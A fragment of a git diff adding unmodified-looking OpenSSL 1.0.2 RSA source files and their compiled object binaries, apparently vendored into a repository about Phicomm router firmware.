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
Mw9jg${;B8x4W2A11ONa4

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_chk.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_chk.c
new file mode 100644
index 0000000..f438386
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_chk.c
@@ -0,0 +1,214 @@
+/* crypto/rsa/rsa_chk.c  -*- Mode: C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/bn.h>
+#include <openssl/err.h>
+#include <openssl/rsa.h>
+
+int RSA_check_key(const RSA *key)
+{
+    BIGNUM *i, *j, *k, *l, *m;
+    BN_CTX *ctx;
+    int r;
+    int ret = 1;
+
+    if (!key->p || !key->q || !key->n || !key->e || !key->d) {
+        RSAerr(RSA_F_RSA_CHECK_KEY, RSA_R_VALUE_MISSING);
+        return 0;
+    }
+
+    i = BN_new();
+    j = BN_new();
+    k = BN_new();
+    l = BN_new();
+    m = BN_new();
+    ctx = BN_CTX_new();
+    if (i == NULL || j == NULL || k == NULL || l == NULL ||
+        m == NULL || ctx == NULL) {
+        ret = -1;
+        RSAerr(RSA_F_RSA_CHECK_KEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /* p prime? */
+    r = BN_is_prime_ex(key->p, BN_prime_checks, NULL, NULL);
+    if (r != 1) {
+        ret = r;
+        if (r != 0)
+            goto err;
+        RSAerr(RSA_F_RSA_CHECK_KEY, RSA_R_P_NOT_PRIME);
+    }
+
+    /* q prime? */
+    r = BN_is_prime_ex(key->q, BN_prime_checks, NULL, NULL);
+    if (r != 1) {
+        ret = r;
+        if (r != 0)
+            goto err;
+        RSAerr(RSA_F_RSA_CHECK_KEY, RSA_R_Q_NOT_PRIME);
+    }
+
+    /* n = p*q? */
+    r = BN_mul(i, key->p, key->q, ctx);
+    if (!r) {
+        ret = -1;
+        goto err;
+    }
+
+    if (BN_cmp(i, key->n) != 0) {
+        ret = 0;
+        RSAerr(RSA_F_RSA_CHECK_KEY, RSA_R_N_DOES_NOT_EQUAL_P_Q);
+    }
+
+    /* d*e = 1  mod lcm(p-1,q-1)? */
+
+    r = BN_sub(i, key->p, BN_value_one());
+    if (!r) {
+        ret = -1;
+        goto err;
+    }
+    r = BN_sub(j, key->q, BN_value_one());
+    if (!r) {
+        ret = -1;
+        goto err;
+    }
+
+    /* now compute k = lcm(i,j) */
+    r = BN_mul(l, i, j, ctx);
+    if (!r) {
+        ret = -1;
+        goto err;
+    }
+    r = BN_gcd(m, i, j, ctx);
+    if (!r) {
+        ret = -1;
+        goto err;
+    }
+    r = BN_div(k, NULL, l, m, ctx); /* remainder is 0 */
+    if (!r) {
+        ret = -1;
+        goto err;
+    }
+
+    r = BN_mod_mul(i, key->d, key->e, k, ctx);
+    if (!r) {
+        ret = -1;
+        goto err;
+    }
+
+    if (!BN_is_one(i)) {
+        ret = 0;
+        RSAerr(RSA_F_RSA_CHECK_KEY, RSA_R_D_E_NOT_CONGRUENT_TO_1);
+    }
+
+    if (key->dmp1 != NULL && key->dmq1 != NULL && key->iqmp != NULL) {
+        /* dmp1 = d mod (p-1)? */
+        r = BN_sub(i, key->p, BN_value_one());
+        if (!r) {
+            ret = -1;
+            goto err;
+        }
+
+        r = BN_mod(j, key->d, i, ctx);
+        if (!r) {
+            ret = -1;
+            goto err;
+        }
+
+        if (BN_cmp(j, key->dmp1) != 0) {
+            ret = 0;
+            RSAerr(RSA_F_RSA_CHECK_KEY, RSA_R_DMP1_NOT_CONGRUENT_TO_D);
+        }
+
+        /* dmq1 = d mod (q-1)? */
+        r = BN_sub(i, key->q, BN_value_one());
+        if (!r) {
+            ret = -1;
+            goto err;
+        }
+
+        r = BN_mod(j, key->d, i, ctx);
+        if (!r) {
+            ret = -1;
+            goto err;
+        }
+
+        if (BN_cmp(j, key->dmq1) != 0) {
+            ret = 0;
+            RSAerr(RSA_F_RSA_CHECK_KEY, RSA_R_DMQ1_NOT_CONGRUENT_TO_D);
+        }
+
+        /* iqmp = q^-1 mod p? */
+        if (!BN_mod_inverse(i, key->q, key->p, ctx)) {
+            ret = -1;
+            goto err;
+        }
+
+        if (BN_cmp(i, key->iqmp) != 0) {
+            ret = 0;
+            RSAerr(RSA_F_RSA_CHECK_KEY, RSA_R_IQMP_NOT_INVERSE_OF_Q);
+        }
+    }
+
+ err:
+    if (i != NULL)
+        BN_free(i);
+    if (j != NULL)
+        BN_free(j);
+    if (k != NULL)
+        BN_free(k);
+    if (l != NULL)
+        BN_free(l);
+    if (m != NULL)
+        BN_free(m);
+    if (ctx != NULL)
+        BN_CTX_free(ctx);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_chk.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_chk.o
new file mode 100644
index 0000000000000000000000000000000000000000..befb5aceb20b20f51b726fbed58f4d8660cc87a2
GIT binary patch
literal 4064
zcmbuBZ)jUp6u@tmcFkt{5@)9!9W#Y6D!MG0ig8TI%bM;v(yjE57PWh(>2s~kpPIbP
z)~@R$jq<3@si5qGpx|I1W#AW4SKX!#1o6)|zbNd(3T`rmI{(IV?z^`+P4htXz{@%J
zcklUg&wKa1%*7Mk>s&4-#l;?E)sdu(z13W`quh+L7S_yu@oxKFeMEg&9aIMf`?b=K
zZCYtA!pz%2MVV&(VQvP?&rAhWCo`Ksg;=p89$pMzdjB<u^wA9boNIuec=+-a483&9
z%^0^d>mt_=S)U61ncxipVRQvNV(Ow+zG`mkDKDE_ddd~ERV(cYFtbG~9SwMx*{GEl
zi#zSKDkQ0<RZCw~>|o`q-uZ9WF@|L6JQ&)-OeB0M{B?MlFHo%ur5i4@qrB)XzXQ{D
zwBxIy*^w4zqQnoK0^p2(=@q}{>iP9YwS__?VJ&IaPdpU(%%>}r3SfVgnOp7LbE{&=
z28tRA5pd9~PgddtAdZ}iCahoSoQLPw6M)nS>u1fnw&Hc|Z_Ex&Ts!p*pGpKg+Cpm}
zyxe15NmzCUEc-n^+usSLhxpWQ)eU&(-+<ZDtjAUKX$x_tl_IX<`qHeA$*tjIQN2lW
zYg%bWW8V4g@Qi}l3ue1*4uR<dQ|_;J@11rrp>PFC(QuRYJ;g$s`CLJRmWW-;B97KA
zLgt9p^!LJF*s1=yInMC8LhsrfvvqSooCq`yZqv%608g-Y{s}wIP_>n^)?@YKi025;
z1>8Y<gLpn*ARY#OPBv%@d&HTt56nh>&-qq+;9$XW`+?L-7uve4?;jghA6JLfL#lqB
z?c2L|x4(06q?k2}{`-S>2SYo;_Z9gtd~8=J7`o>U8#9LI+y_@9T>B0TGB^#3$l%0t
zX%*V_Y#(z?`CRSIO`el*TNA*yin#`K=vI6$uZt;dC)_c`|58It>3p$KRYK3NSCvSq
zsY~f~Uv?{zE+wQYov;E{#uQ&n@rW2s3Q|Fh*DLkr-F4rLSi7u#wU?Xkb~VG1o2_39
zId5{{^{aOCF0OXD35J_UoxE4Tw!npbua%tu>hT90c$Wh|=)ey-aKnM89r&~ZKkmR^
zaNs8#_$dc|#(}@<z*)YK)Kg;<!4&K3SHUt;6Z(WP&GdbVgE2LsAMEb#j}PbrYAg}g
zS-h`LpDdcXk<aJyEOtQ88qc8GJ1`{8@q#{?AI})NF@-akVj5K{Gl}X*GF>$ET-Lxr
zp*Vu-aB39Q==c#-ncS%KL32EN#K;%;@+b2K*O-gjuqD=uKOlI-@LBp3J_{(1A_PH>
ze+48TK?qXIpR(~9o_FB*wnwRrQ?@bZEnv&MpA$~&Tq0Z{>o?)S2C3aw2jO)6e!^+|
zVZyx-PuBA^;dq`Te}!-w=XJtwChJcVzKQU&gwypO6HeEEM>wr>nebak{8o4oqhNpV
z9W3kLMfhgI@ox-DZ9iWnoYwg^;k3>V38#6#BAoW~I^ndR%Y@UsjpEgeb<(^YgwwqD
z5>E3D5>E4u5q>M=kbRpaoW^;Ra2n?{;kS`EXC3%C2mYl4|G|M@BfO2|^@ELqZ56HM
zV-_q-XUyaXXfto?F=^$EbTVifQzi?JCe0)ZjuZ+kn95}`Miy8$XBt8H=I<z&$<%}x
zAI=tollk1FkvFGVkVi1a;B}PD;1}ZmiyuPZBVYT)jRHfF-$#37ua!3HcDV4_iNZz2
zCqBs@oCMhj7v_;)YV0M-cDRs>HY4KFCH&-AYH>W}klh6q#{94TVerM6A-Jf>{C83a
zw#+Z}Zo=r&+`p`UKRDsPnpMvbj3<S^A8abJf0B)Wfwk27pA`OMa-q<*{=>j=X;jQh
z)rKE25P6^Q{-Lk*m%LtX^t&PQ4~fF?EN`gekF56I0b;%4uighZAR_xN5x&dn`G-XP
LX}M77TK|6lBxQD1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_crpt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_crpt.c
new file mode 100644
index 0000000..5c416b5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_crpt.c
@@ -0,0 +1,247 @@
+/* crypto/rsa/rsa_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+int RSA_size(const RSA *r)
+{
+    return (BN_num_bytes(r->n));
+}
+
+int RSA_public_encrypt(int flen, const unsigned char *from, unsigned char *to,
+                       RSA *rsa, int padding)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(rsa->meth->flags & RSA_FLAG_FIPS_METHOD)
+        && !(rsa->flags & RSA_FLAG_NON_FIPS_ALLOW)) {
+        RSAerr(RSA_F_RSA_PUBLIC_ENCRYPT, RSA_R_NON_FIPS_RSA_METHOD);
+        return -1;
+    }
+#endif
+    return (rsa->meth->rsa_pub_enc(flen, from, to, rsa, padding));
+}
+
+int RSA_private_encrypt(int flen, const unsigned char *from,
+                        unsigned char *to, RSA *rsa, int padding)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(rsa->meth->flags & RSA_FLAG_FIPS_METHOD)
+        && !(rsa->flags & RSA_FLAG_NON_FIPS_ALLOW)) {
+        RSAerr(RSA_F_RSA_PRIVATE_ENCRYPT, RSA_R_NON_FIPS_RSA_METHOD);
+        return -1;
+    }
+#endif
+    return (rsa->meth->rsa_priv_enc(flen, from, to, rsa, padding));
+}
+
+int RSA_private_decrypt(int flen, const unsigned char *from,
+                        unsigned char *to, RSA *rsa, int padding)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(rsa->meth->flags & RSA_FLAG_FIPS_METHOD)
+        && !(rsa->flags & RSA_FLAG_NON_FIPS_ALLOW)) {
+        RSAerr(RSA_F_RSA_PRIVATE_DECRYPT, RSA_R_NON_FIPS_RSA_METHOD);
+        return -1;
+    }
+#endif
+    return (rsa->meth->rsa_priv_dec(flen, from, to, rsa, padding));
+}
+
+int RSA_public_decrypt(int flen, const unsigned char *from, unsigned char *to,
+                       RSA *rsa, int padding)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(rsa->meth->flags & RSA_FLAG_FIPS_METHOD)
+        && !(rsa->flags & RSA_FLAG_NON_FIPS_ALLOW)) {
+        RSAerr(RSA_F_RSA_PUBLIC_DECRYPT, RSA_R_NON_FIPS_RSA_METHOD);
+        return -1;
+    }
+#endif
+    return (rsa->meth->rsa_pub_dec(flen, from, to, rsa, padding));
+}
+
+int RSA_flags(const RSA *r)
+{
+    return ((r == NULL) ? 0 : r->meth->flags);
+}
+
+void RSA_blinding_off(RSA *rsa)
+{
+    if (rsa->blinding != NULL) {
+        BN_BLINDING_free(rsa->blinding);
+        rsa->blinding = NULL;
+    }
+    rsa->flags &= ~RSA_FLAG_BLINDING;
+    rsa->flags |= RSA_FLAG_NO_BLINDING;
+}
+
+int RSA_blinding_on(RSA *rsa, BN_CTX *ctx)
+{
+    int ret = 0;
+
+    if (rsa->blinding != NULL)
+        RSA_blinding_off(rsa);
+
+    rsa->blinding = RSA_setup_blinding(rsa, ctx);
+    if (rsa->blinding == NULL)
+        goto err;
+
+    rsa->flags |= RSA_FLAG_BLINDING;
+    rsa->flags &= ~RSA_FLAG_NO_BLINDING;
+    ret = 1;
+ err:
+    return (ret);
+}
+
+static BIGNUM *rsa_get_public_exp(const BIGNUM *d, const BIGNUM *p,
+                                  const BIGNUM *q, BN_CTX *ctx)
+{
+    BIGNUM *ret = NULL, *r0, *r1, *r2;
+
+    if (d == NULL || p == NULL || q == NULL)
+        return NULL;
+
+    BN_CTX_start(ctx);
+    r0 = BN_CTX_get(ctx);
+    r1 = BN_CTX_get(ctx);
+    r2 = BN_CTX_get(ctx);
+    if (r2 == NULL)
+        goto err;
+
+    if (!BN_sub(r1, p, BN_value_one()))
+        goto err;
+    if (!BN_sub(r2, q, BN_value_one()))
+        goto err;
+    if (!BN_mul(r0, r1, r2, ctx))
+        goto err;
+
+    ret = BN_mod_inverse(NULL, d, r0, ctx);
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+BN_BLINDING *RSA_setup_blinding(RSA *rsa, BN_CTX *in_ctx)
+{
+    BIGNUM local_n;
+    BIGNUM *e, *n;
+    BN_CTX *ctx;
+    BN_BLINDING *ret = NULL;
+
+    if (in_ctx == NULL) {
+        if ((ctx = BN_CTX_new()) == NULL)
+            return 0;
+    } else
+        ctx = in_ctx;
+
+    BN_CTX_start(ctx);
+    e = BN_CTX_get(ctx);
+    if (e == NULL) {
+        RSAerr(RSA_F_RSA_SETUP_BLINDING, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (rsa->e == NULL) {
+        e = rsa_get_public_exp(rsa->d, rsa->p, rsa->q, ctx);
+        if (e == NULL) {
+            RSAerr(RSA_F_RSA_SETUP_BLINDING, RSA_R_NO_PUBLIC_EXPONENT);
+            goto err;
+        }
+    } else
+        e = rsa->e;
+
+    if ((RAND_status() == 0) && rsa->d != NULL && rsa->d->d != NULL) {
+        /*
+         * if PRNG is not properly seeded, resort to secret exponent as
+         * unpredictable seed
+         */
+        RAND_add(rsa->d->d, rsa->d->dmax * sizeof rsa->d->d[0], 0.0);
+    }
+
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        /* Set BN_FLG_CONSTTIME flag */
+        n = &local_n;
+        BN_with_flags(n, rsa->n, BN_FLG_CONSTTIME);
+    } else
+        n = rsa->n;
+
+    ret = BN_BLINDING_create_param(NULL, e, n, ctx,
+                                   rsa->meth->bn_mod_exp, rsa->_method_mod_n);
+    if (ret == NULL) {
+        RSAerr(RSA_F_RSA_SETUP_BLINDING, ERR_R_BN_LIB);
+        goto err;
+    }
+    CRYPTO_THREADID_current(BN_BLINDING_thread_id(ret));
+ err:
+    BN_CTX_end(ctx);
+    if (in_ctx == NULL)
+        BN_CTX_free(ctx);
+    if (rsa->e == NULL)
+        BN_free(e);
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_crpt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_crpt.o
new file mode 100644
index 0000000000000000000000000000000000000000..d0b7f9669c0c6f4ae1e43294b01802b03732bf56
GIT binary patch
literal 4552
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
W{=O!`v!<SXJO97S6!gpDxBnL}LrH7^

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_depr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_depr.c
new file mode 100644
index 0000000..32f0c88
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_depr.c
